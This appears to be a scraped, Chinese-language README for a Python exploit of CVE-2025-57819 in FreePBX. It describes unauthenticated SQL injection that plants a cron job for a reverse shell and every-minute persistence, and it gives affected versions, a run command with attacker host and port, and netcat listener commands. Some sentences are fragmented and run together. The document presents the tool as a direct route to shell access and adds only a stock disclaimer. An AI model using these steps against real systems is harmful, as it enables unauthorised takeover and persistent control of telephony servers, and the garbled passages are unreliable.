
针对 FreePBX 的 CVE-2025-57819 Python 利用程序,通过未认证的 SQL 注入实现远程代码执行,并自动建立反向 Shell 和基于 cron 的持久化。
< 15.0.66、< 16.0.89 及 < 17.0.3本脚本利用存在漏洞的 FreePBX 端点模块中的 CVE-2025-57819。该漏洞允许 SQL 注入,进而被用于注入恶意定时任务。
与其他公开漏洞不同,无需通过上传的 WebShell 与目标交互等额外步骤。这是一种直接的方法,可直接为您提供反向 Shell 访问。
通过 SQL 注入和定时任务操纵实现远程代码执行。成功利用将在目标系统上获得一个反向 Shell。根据配置,这可能导致完全系统沦陷。
* * * * *) 的定时任务实现持久化base64 有效载荷在遇到 + 字符被解释为空格时会损坏。通过提供目标和监听器配置来运行漏洞:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: 目标主机名或 IP 地址(存在漏洞的 FreePBX 实例)<lhost>: 攻击者用于接收反向 Shell 回调的 IP 地址<lport>: 监听传入连接的端口python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
在执行漏洞之前启动一个监听器:
nc -lvnp <port>
nc -nlvp 9999
本工具仅用于教育目的和授权的安全测试。未经明确许可在系统上未经授权使用是违法的。作者对因使用本工具造成的误用或损害不承担任何责任。
Its1Zero - [email protected]